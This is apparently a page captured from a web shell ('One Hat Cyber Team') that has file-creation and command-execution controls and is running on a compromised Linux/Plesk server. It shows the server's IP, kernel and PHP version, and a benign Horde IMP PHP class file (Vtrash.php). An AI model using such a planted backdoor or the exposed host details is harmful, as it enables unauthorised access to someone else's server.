⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
imp
/
lib
/
Search
/
Vfolder
/
View File Name :
Vtrash.php
* @category Horde * @copyright 2010-2017 Horde LLC * @license http://www.horde.org/licenses/gpl GPL * @package IMP */ class IMP_Search_Vfolder_Vtrash extends IMP_Search_Vfolder_Builtin { /** * Display this virtual folder in the preferences screen? * * @var boolean */ public $prefDisplay = false; /** * Initialization tasks. */ protected function _init() { $this->_id = 'vtrash'; $this->_label = _("Virtual Trash"); $this->add(new IMP_Search_Element_Flag( Horde_Imap_Client::FLAG_DELETED, true )); } /** * Get object properties. * Only create mailbox list on demand. * * @see __get() */ public function __get($name) { global $injector; switch ($name) { case 'mboxes': $iterator = new IMP_Ftree_IteratorFilter( $injector->getInstance('IMP_Ftree') ); $iterator->add(array( $iterator::CONTAINERS, $iterator::NONIMAP )); return array_map('strval', iterator_to_array($iterator, false)); } return parent::__get($name); } }